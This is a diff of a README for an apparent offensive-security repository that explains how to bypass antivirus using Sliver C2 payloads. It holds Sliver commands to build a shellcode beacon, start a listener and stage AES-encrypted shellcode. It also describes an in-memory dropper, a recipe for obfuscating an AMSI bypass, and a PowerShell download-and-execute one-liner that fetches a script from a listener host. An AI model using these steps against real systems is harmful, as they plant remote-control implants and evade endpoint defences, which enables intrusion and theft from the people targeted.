2ptr/Sliver-AV/README.md

 # Bypass AV with Sliver c2

-Dropper + reflective load script for bypassing AV with sliver c2
+Toolkit and sample VS solution to start bypassing AV with Sliver C2 payloads.

 Taken from [this article](https://medium.com/@youcef.s.kelouaz/writing-a-sliver-c2-powershell-stager-with-shellcode-compression-and-aes-encryption-9725c0201ea8).

-Compression is a huge IOC so I may change this to remove

 ## In Sliver

-Create new beacon profile
+Create new beacon profile (does not need to be HTTPS)

-`profiles new -b  https://192.168.1.11:443 --skip-symbols --format shellcode --arch amd64 my_profile`
+`profiles new --http http://10.10.14.225:8080 --format shellcode http1`

-Start listener and add SSL cert (you can fake with msf impersonate_ssl)

-`https -L 192.168.1.11 -l 443 -c /home/ycf/blog/sliver/crt.crt -k /home/ycf/blog/sliver/key.key`
+Start listener

+`http -L 10.10.14.225 -l 8080`

-Stage beacon payload and create AES keys
+Stage beacon payload - compress and encrypt (optional)

-`stage-listener --url https://192.168.1.11:8080 --profile my_profile -c /home/ycf/blog/sliver/crt.crt -k /home/ycf/blog/sliver/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV`
+`stage-listener --url http://10.10.14.225:8443 --profile http1 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV`

-## Dropper
+## Dropping In-Memory

 Shellcode dropper solution will download, decompress, decrypt shellcode and execute.
-Best way is to reflectively load via PowerShell as it is .NET assembly, and the dropper is not evasive at all (you need AMSI bypass).
+Best way is to reflectively load via PowerShell as it is .NET assembly after an AMSI bypass.

-1. Read in solution DLL assembly.
-The solution MUST BE `.NET FRAMEWORK` (~4.0).
+1. Setup your AMSI bypass.
+	- Use `AmsiTrigger` to detect flags in `am_obfs.ps1`
+	- Use `Invoke-Obfuscation` to patch these
+	- Update the download url in the bypass.

+2. Make any modifications to the assembly that you like
+	- Afterwards, grab the base64 blob and update `loader.ps1`
-`get-content -encoding byte -path .\sliverloader.dll | clip`
+	- `get-content -encoding byte -path .\sliverloader.dll | clip` and then CyberChef

-2. Convert your keys and IV to raw bytes.

-3. Update loader script

-4. Use `amsiscanbuffer()` bypass for entire process unhook including CLR
+3. Convert any encryption keys or IVs to bytes and update `loader.ps1`

+4. Execute the dropper with bypass added
+	- `(New-Object Net.WebClient).DownloadString('http://10.10.14.225:1234/am_obfs.ps1) | iex`